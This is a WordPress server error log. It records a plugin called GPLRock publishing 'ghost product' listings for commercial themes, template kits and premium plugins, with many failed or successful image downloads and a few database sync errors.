gabo-minimalist-full-screen-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/gabo---minimalist--full-screen-wordpress-theme-2402.webp [05-Apr-2026 03:20:46 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: gabo-minimalist-full-screen-wordpress-theme [05-Apr-2026 03:20:46 UTC] GPLRock: Image download failed for product vitic-tools-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:20:49 UTC] GPLRock: Image download failed for product vitic-tools-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:20:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/vitic--tools-woocommerce-wordpress-theme-7408.webp for product vitic-tools-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:20:51 UTC] GPLRock: Image download failed for product vitic-tools-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:20:53 UTC] GPLRock: Image download failed for product vitic-tools-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:20:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/vitic--tools-woocommerce-wordpress-theme-7408.webp for product vitic-tools-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:20:55 UTC] GPLRock WARNING: Image download failed for product vitic-tools-woocommerce-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/vitic--tools-woocommerce-wordpress-theme-7408.webp [05-Apr-2026 03:20:55 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: vitic-tools-woocommerce-wordpress-theme [05-Apr-2026 03:20:55 UTC] GPLRock: Image download failed for product chinchilla-pet-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:20:57 UTC] GPLRock: Image download failed for product chinchilla-pet-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:20:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/chinchilla---pet-wordpress-theme-8174.webp for product chinchilla-pet-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:20:59 UTC] GPLRock: Image download failed for product chinchilla-pet-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:21:02 UTC] GPLRock: Image download failed for product chinchilla-pet-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:21:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/chinchilla---pet-wordpress-theme-8174.webp for product chinchilla-pet-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:21:04 UTC] GPLRock WARNING: Image download failed for product chinchilla-pet-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/chinchilla---pet-wordpress-theme-8174.webp [05-Apr-2026 03:21:04 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: chinchilla-pet-wordpress-theme [05-Apr-2026 03:21:04 UTC] GPLRock: Image download failed for product darion-furniture-store-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:21:06 UTC] GPLRock: Image download failed for product darion-furniture-store-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:21:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/darion--furniture-store-wordpress-theme-26896.webp for product darion-furniture-store-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:21:08 UTC] GPLRock: Image download failed for product darion-furniture-store-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:21:10 UTC] GPLRock: Image download failed for product darion-furniture-store-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:21:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/darion--furniture-store-wordpress-theme-26896.webp for product darion-furniture-store-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:21:12 UTC] GPLRock WARNING: Image download failed for product darion-furniture-store-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/darion--furniture-store-wordpress-theme-26896.webp [05-Apr-2026 03:21:12 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: darion-furniture-store-wordpress-theme [05-Apr-2026 03:21:28 UTC] GPLRock: Image downloaded successfully for product startly-template-kit-for-startups-saas-software (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9772e2a0.webp [05-Apr-2026 03:21:28 UTC] GPLRock: Using pre-downloaded image for product startly-template-kit-for-startups-saas-software: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9772e2a0.webp [05-Apr-2026 03:21:28 UTC] GPLRock: Ghost product published with image - Product ID: startly-template-kit-for-startups-saas-software [05-Apr-2026 03:21:30 UTC] GPLRock: Image downloaded successfully for product startio-saas-digital-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-36ab4c9d.webp [05-Apr-2026 03:21:30 UTC] GPLRock: Using pre-downloaded image for product startio-saas-digital-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-36ab4c9d.webp [05-Apr-2026 03:21:30 UTC] GPLRock: Ghost product published with image - Product ID: startio-saas-digital-agency-elementor-template-kit [05-Apr-2026 03:21:31 UTC] GPLRock: Image downloaded successfully for product startec-saas-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2a798680.webp [05-Apr-2026 03:21:31 UTC] GPLRock: Using pre-downloaded image for product startec-saas-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2a798680.webp [05-Apr-2026 03:21:31 UTC] GPLRock: Ghost product published with image - Product ID: startec-saas-elementor-template-kit [05-Apr-2026 03:21:32 UTC] GPLRock: Image downloaded successfully for product solity-saas-startup-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6c79f254.webp [05-Apr-2026 03:21:33 UTC] GPLRock: Using pre-downloaded image for product solity-saas-startup-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6c79f254.webp [05-Apr-2026 03:21:33 UTC] GPLRock: Ghost product published with image - Product ID: solity-saas-startup-elementor-template-kit [05-Apr-2026 03:21:34 UTC] GPLRock: Image downloaded successfully for product solicians-attorney-law-firm-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-84c9b8f3.webp [05-Apr-2026 03:21:34 UTC] GPLRock: Using pre-downloaded image for product solicians-attorney-law-firm-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-84c9b8f3.webp [05-Apr-2026 03:21:34 UTC] GPLRock: Ghost product published with image - Product ID: solicians-attorney-law-firm-elementor-template-kit [05-Apr-2026 03:21:35 UTC] GPLRock: Image downloaded successfully for product solar-sure-renewable-energy-business-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-029bd0f5.webp [05-Apr-2026 03:21:35 UTC] GPLRock: Using pre-downloaded image for product solar-sure-renewable-energy-business-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-029bd0f5.webp [05-Apr-2026 03:21:35 UTC] GPLRock: Ghost product published with image - Product ID: solar-sure-renewable-energy-business-elementor-template-kit [05-Apr-2026 03:21:36 UTC] GPLRock: Image downloaded successfully for product sohowool-handmade-craft-patterns-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-06b084a6.webp [05-Apr-2026 03:21:36 UTC] GPLRock: Using pre-downloaded image for product sohowool-handmade-craft-patterns-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-06b084a6.webp [05-Apr-2026 03:21:36 UTC] GPLRock: Ghost product published with image - Product ID: sohowool-handmade-craft-patterns-elementor-template-kit [05-Apr-2026 03:21:38 UTC] GPLRock: Image downloaded successfully for product sogram-social-media-marketing-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a09589e8.webp [05-Apr-2026 03:21:38 UTC] GPLRock: Using pre-downloaded image for product sogram-social-media-marketing-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a09589e8.webp [05-Apr-2026 03:21:38 UTC] GPLRock: Ghost product published with image - Product ID: sogram-social-media-marketing-agency-elementor-template-kit [05-Apr-2026 03:21:39 UTC] GPLRock: Image downloaded successfully for product softup-saas-startup-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-58172465.webp [05-Apr-2026 03:21:39 UTC] GPLRock: Using pre-downloaded image for product softup-saas-startup-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-58172465.webp [05-Apr-2026 03:21:39 UTC] GPLRock: Ghost product published with image - Product ID: softup-saas-startup-elementor-template-kit [05-Apr-2026 03:21:41 UTC] GPLRock: Image downloaded successfully for product softo-it-solutions-business-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ec745749.webp [05-Apr-2026 03:21:41 UTC] GPLRock: Using pre-downloaded image for product softo-it-solutions-business-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ec745749.webp [05-Apr-2026 03:21:41 UTC] GPLRock: Ghost product published with image - Product ID: softo-it-solutions-business-elementor-template-kit [05-Apr-2026 03:22:36 UTC] GPLRock: Image downloaded successfully for product envira-gallery-dropbox-importer-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a6a941a9.jpg [05-Apr-2026 03:22:36 UTC] GPLRock: Using pre-downloaded image for product envira-gallery-dropbox-importer-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a6a941a9.jpg [05-Apr-2026 03:22:36 UTC] GPLRock: Ghost product published with image - Product ID: envira-gallery-dropbox-importer-addon [05-Apr-2026 03:22:38 UTC] GPLRock: Image downloaded successfully for product soliloquy-carousel-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-1c04cd01.jpg [05-Apr-2026 03:22:38 UTC] GPLRock: Using pre-downloaded image for product soliloquy-carousel-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-1c04cd01.jpg [05-Apr-2026 03:22:38 UTC] GPLRock: Ghost product published with image - Product ID: soliloquy-carousel-addon [05-Apr-2026 03:22:39 UTC] GPLRock: Image downloaded successfully for product soliloquy-instagram-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-eddc768e.jpg [05-Apr-2026 03:22:39 UTC] GPLRock: Using pre-downloaded image for product soliloquy-instagram-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-eddc768e.jpg [05-Apr-2026 03:22:39 UTC] GPLRock: Ghost product published with image - Product ID: soliloquy-instagram-addon [05-Apr-2026 03:22:41 UTC] GPLRock: Image downloaded successfully for product beaver-tunnels-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-7f2f1742.jpg [05-Apr-2026 03:22:41 UTC] GPLRock: Using pre-downloaded image for product beaver-tunnels-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-7f2f1742.jpg [05-Apr-2026 03:22:41 UTC] GPLRock: Ghost product published with image - Product ID: beaver-tunnels-addon [05-Apr-2026 03:22:42 UTC] GPLRock: Image downloaded successfully for product buddyapp-mobile-first-community-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-566263aa.jpg [05-Apr-2026 03:22:42 UTC] GPLRock: Using pre-downloaded image for product buddyapp-mobile-first-community-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-566263aa.jpg [05-Apr-2026 03:22:42 UTC] GPLRock: Ghost product published with image - Product ID: buddyapp-mobile-first-community-wordpress-theme [05-Apr-2026 03:22:44 UTC] GPLRock: Image downloaded successfully for product hashbar-pro-wordpress-notification-bar (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-629b684c.jpg [05-Apr-2026 03:22:44 UTC] GPLRock: Using pre-downloaded image for product hashbar-pro-wordpress-notification-bar: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-629b684c.jpg [05-Apr-2026 03:22:44 UTC] GPLRock: Ghost product published with image - Product ID: hashbar-pro-wordpress-notification-bar [05-Apr-2026 03:22:46 UTC] GPLRock: Image downloaded successfully for product rankie-wordpress-rank-tracker-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1f436c52.jpg [05-Apr-2026 03:22:46 UTC] GPLRock: Using pre-downloaded image for product rankie-wordpress-rank-tracker-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1f436c52.jpg [05-Apr-2026 03:22:46 UTC] GPLRock: Ghost product published with image - Product ID: rankie-wordpress-rank-tracker-plugin [05-Apr-2026 03:22:47 UTC] GPLRock: Image downloaded successfully for product wp-rich-snippets-compare (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-82a4a8a6.jpg [05-Apr-2026 03:22:47 UTC] GPLRock: Using pre-downloaded image for product wp-rich-snippets-compare: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-82a4a8a6.jpg [05-Apr-2026 03:22:47 UTC] GPLRock: Ghost product published with image - Product ID: wp-rich-snippets-compare [05-Apr-2026 03:22:49 UTC] GPLRock: Image downloaded successfully for product political-wordpress-theme-frontrunner (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c7565b36.jpg [05-Apr-2026 03:22:49 UTC] GPLRock: Using pre-downloaded image for product political-wordpress-theme-frontrunner: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c7565b36.jpg [05-Apr-2026 03:22:49 UTC] GPLRock: Ghost product published with image - Product ID: political-wordpress-theme-frontrunner [05-Apr-2026 03:22:51 UTC] GPLRock: Image downloaded successfully for product mythemeshop-wp-tab-widget-pro (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-45ac657d.jpg [05-Apr-2026 03:22:51 UTC] GPLRock: Using pre-downloaded image for product mythemeshop-wp-tab-widget-pro: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-45ac657d.jpg [05-Apr-2026 03:22:51 UTC] GPLRock: Ghost product published with image - Product ID: mythemeshop-wp-tab-widget-pro [05-Apr-2026 03:23:52 UTC] GPLRock: Image downloaded successfully for product kids-kindergarten-child-care-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-89ebef90.webp [05-Apr-2026 03:23:52 UTC] GPLRock: Using pre-downloaded image for product kids-kindergarten-child-care-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-89ebef90.webp [05-Apr-2026 03:23:52 UTC] GPLRock: Ghost product published with image - Product ID: kids-kindergarten-child-care-elementor-template-kit [05-Apr-2026 03:23:53 UTC] GPLRock: Image downloaded successfully for product kayoo-wood-company-woocommerce-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-7a618ab5.webp [05-Apr-2026 03:23:53 UTC] GPLRock: Using pre-downloaded image for product kayoo-wood-company-woocommerce-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-7a618ab5.webp [05-Apr-2026 03:23:53 UTC] GPLRock: Ghost product published with image - Product ID: kayoo-wood-company-woocommerce-elementor-template-kit [05-Apr-2026 03:23:54 UTC] GPLRock: Image downloaded successfully for product kanawa-modern-travel-blog-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9b76ac6a.webp [05-Apr-2026 03:23:55 UTC] GPLRock: Using pre-downloaded image for product kanawa-modern-travel-blog-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9b76ac6a.webp [05-Apr-2026 03:23:55 UTC] GPLRock: Ghost product published with image - Product ID: kanawa-modern-travel-blog-elementor-template-kit [05-Apr-2026 03:23:56 UTC] GPLRock: Image downloaded successfully for product kababi-restaurant-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5a2f9db4.webp [05-Apr-2026 03:23:56 UTC] GPLRock: Using pre-downloaded image for product kababi-restaurant-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5a2f9db4.webp [05-Apr-2026 03:23:56 UTC] GPLRock: Ghost product published with image - Product ID: kababi-restaurant-elementor-template-kit [05-Apr-2026 03:23:57 UTC] GPLRock: Image downloaded successfully for product jewellrywear-ecommerce-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b3e37bf2.webp [05-Apr-2026 03:23:57 UTC] GPLRock: Using pre-downloaded image for product jewellrywear-ecommerce-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b3e37bf2.webp [05-Apr-2026 03:23:57 UTC] GPLRock: Ghost product published with image - Product ID: jewellrywear-ecommerce-elementor-template-kit [05-Apr-2026 03:23:59 UTC] GPLRock: Image downloaded successfully for product jetrans-logistics-transportation-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-846988d2.jpg [05-Apr-2026 03:23:59 UTC] GPLRock: Using pre-downloaded image for product jetrans-logistics-transportation-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-846988d2.jpg [05-Apr-2026 03:23:59 UTC] GPLRock: Ghost product published with image - Product ID: jetrans-logistics-transportation-elementor-template-kit [05-Apr-2026 03:24:01 UTC] GPLRock: Image downloaded successfully for product jbanez-guitar-music-equipment-store-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7d6931fd.jpg [05-Apr-2026 03:24:01 UTC] GPLRock: Using pre-downloaded image for product jbanez-guitar-music-equipment-store-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7d6931fd.jpg [05-Apr-2026 03:24:01 UTC] GPLRock: Ghost product published with image - Product ID: jbanez-guitar-music-equipment-store-elementor-template-kit [05-Apr-2026 03:24:10 UTC] GPLRock: Image downloaded successfully for product investmoon-finance-investment-manager-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e95cf307.jpg [05-Apr-2026 03:24:10 UTC] GPLRock: Using pre-downloaded image for product investmoon-finance-investment-manager-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e95cf307.jpg [05-Apr-2026 03:24:10 UTC] GPLRock: Ghost product published with image - Product ID: investmoon-finance-investment-manager-elementor-template-kit [05-Apr-2026 03:24:11 UTC] GPLRock: Image downloaded successfully for product hanan-interior-design-furniture-store-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2a3c62e4.jpg [05-Apr-2026 03:24:11 UTC] GPLRock: Using pre-downloaded image for product hanan-interior-design-furniture-store-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2a3c62e4.jpg [05-Apr-2026 03:24:11 UTC] GPLRock: Ghost product published with image - Product ID: hanan-interior-design-furniture-store-elementor-template-kit [05-Apr-2026 03:24:13 UTC] GPLRock: Image downloaded successfully for product gymniac-fitness-exercise-equipment-store-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-92c43bed.webp [05-Apr-2026 03:24:13 UTC] GPLRock: Using pre-downloaded image for product gymniac-fitness-exercise-equipment-store-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-92c43bed.webp [05-Apr-2026 03:24:13 UTC] GPLRock: Ghost product published with image - Product ID: gymniac-fitness-exercise-equipment-store-elementor-template-kit [05-Apr-2026 03:25:19 UTC] GPLRock: Image downloaded successfully for product restrict-content-pro (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-87bbdc6f.jpg [05-Apr-2026 03:25:19 UTC] GPLRock: Using pre-downloaded image for product restrict-content-pro: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-87bbdc6f.jpg [05-Apr-2026 03:25:19 UTC] GPLRock: Ghost product published with image - Product ID: restrict-content-pro [05-Apr-2026 03:25:21 UTC] GPLRock: Image downloaded successfully for product wordpress-multilingual-contact-form-7-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-238a9bd4.jpg [05-Apr-2026 03:25:21 UTC] GPLRock: Using pre-downloaded image for product wordpress-multilingual-contact-form-7-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-238a9bd4.jpg [05-Apr-2026 03:25:21 UTC] GPLRock: Ghost product published with image - Product ID: wordpress-multilingual-contact-form-7-addon [05-Apr-2026 03:25:22 UTC] GPLRock: Image downloaded successfully for product relevanssi-premium (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8cf6ea0c.jpg [05-Apr-2026 03:25:22 UTC] GPLRock: Using pre-downloaded image for product relevanssi-premium: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8cf6ea0c.jpg [05-Apr-2026 03:25:22 UTC] GPLRock: Ghost product published with image - Product ID: relevanssi-premium [05-Apr-2026 03:25:24 UTC] GPLRock: Image downloaded successfully for product kleo-pro-community-focused-multi-purpose-buddypress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8e93301c.jpg [05-Apr-2026 03:25:24 UTC] GPLRock: Using pre-downloaded image for product kleo-pro-community-focused-multi-purpose-buddypress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8e93301c.jpg [05-Apr-2026 03:25:24 UTC] GPLRock: Ghost product published with image - Product ID: kleo-pro-community-focused-multi-purpose-buddypress-theme [05-Apr-2026 03:25:25 UTC] GPLRock: Image downloaded successfully for product wordpress-multilingual-translation-management-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-938b0f08.jpg [05-Apr-2026 03:25:25 UTC] GPLRock: Using pre-downloaded image for product wordpress-multilingual-translation-management-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-938b0f08.jpg [05-Apr-2026 03:25:25 UTC] GPLRock: Ghost product published with image - Product ID: wordpress-multilingual-translation-management-addon [05-Apr-2026 03:25:26 UTC] GPLRock: Image downloaded successfully for product wordpress-multilingual-media-add-on (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-40f7529d.jpg [05-Apr-2026 03:25:26 UTC] GPLRock: Using pre-downloaded image for product wordpress-multilingual-media-add-on: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-40f7529d.jpg [05-Apr-2026 03:25:26 UTC] GPLRock: Ghost product published with image - Product ID: wordpress-multilingual-media-add-on [05-Apr-2026 03:25:28 UTC] GPLRock: Image downloaded successfully for product wordpress-multilingual-string-translation-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b32b826d.jpg [05-Apr-2026 03:25:28 UTC] GPLRock: Using pre-downloaded image for product wordpress-multilingual-string-translation-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b32b826d.jpg [05-Apr-2026 03:25:28 UTC] GPLRock: Ghost product published with image - Product ID: wordpress-multilingual-string-translation-addon [05-Apr-2026 03:25:29 UTC] GPLRock: Image downloaded successfully for product ithemes-security-pro (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ba741654.jpg [05-Apr-2026 03:25:29 UTC] GPLRock: Using pre-downloaded image for product ithemes-security-pro: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ba741654.jpg [05-Apr-2026 03:25:29 UTC] GPLRock: Ghost product published with image - Product ID: ithemes-security-pro [05-Apr-2026 03:25:31 UTC] GPLRock: Image downloaded successfully for product woocommerce-cart-notices (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b812378e.jpg [05-Apr-2026 03:25:31 UTC] GPLRock: Using pre-downloaded image for product woocommerce-cart-notices: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b812378e.jpg [05-Apr-2026 03:25:31 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-cart-notices [05-Apr-2026 03:25:32 UTC] GPLRock: Image downloaded successfully for product woocommerce-order-status-control (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4cd89b6f.jpg [05-Apr-2026 03:25:32 UTC] GPLRock: Using pre-downloaded image for product woocommerce-order-status-control: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4cd89b6f.jpg [05-Apr-2026 03:25:32 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-order-status-control [05-Apr-2026 03:25:37 UTC] WordPress database error Commands out of sync; you can't run this command now for query SELECT option_name, option_value FROM wpwf_options WHERE option_name IN ('_transient_doing_cron','_transient_timeout_doing_cron') made by shutdown_action_hook, do_action('shutdown'), WP_Hook->do_action, WP_Hook->apply_filters, _wp_cron, spawn_cron, get_transient, wp_prime_option_caches [05-Apr-2026 03:25:37 UTC] WordPress database error Commands out of sync; you can't run this command now for query INSERT INTO `wpwf_options` (`option_name`, `option_value`, `autoload`) VALUES ('_transient_doing_cron', '1775359537.7914350032806396484375', 'on') ON DUPLICATE KEY UPDATE `option_name` = VALUES(`option_name`), `option_value` = VALUES(`option_value`), `autoload` = VALUES(`autoload`) made by shutdown_action_hook, do_action('shutdown'), WP_Hook->do_action, WP_Hook->apply_filters, _wp_cron, spawn_cron, set_transient, add_option [05-Apr-2026 03:27:16 UTC] GPLRock: Image downloaded successfully for product pluto-clean-personal-wordpress-masonry-blog-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7ebbeef4.jpg [05-Apr-2026 03:27:16 UTC] GPLRock: Using pre-downloaded image for product pluto-clean-personal-wordpress-masonry-blog-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7ebbeef4.jpg [05-Apr-2026 03:27:16 UTC] GPLRock: Ghost product published with image - Product ID: pluto-clean-personal-wordpress-masonry-blog-theme [05-Apr-2026 03:27:17 UTC] GPLRock: Image downloaded successfully for product mainwp-advanced-uptime-monitor (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b7aede89.jpg [05-Apr-2026 03:27:17 UTC] GPLRock: Using pre-downloaded image for product mainwp-advanced-uptime-monitor: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b7aede89.jpg [05-Apr-2026 03:27:17 UTC] GPLRock: Ghost product published with image - Product ID: mainwp-advanced-uptime-monitor [05-Apr-2026 03:27:19 UTC] GPLRock: Image downloaded successfully for product shipping-details-plugin-for-woocommerce (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ce1049e4.jpg [05-Apr-2026 03:27:19 UTC] GPLRock: Using pre-downloaded image for product shipping-details-plugin-for-woocommerce: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ce1049e4.jpg [05-Apr-2026 03:27:19 UTC] GPLRock: Ghost product published with image - Product ID: 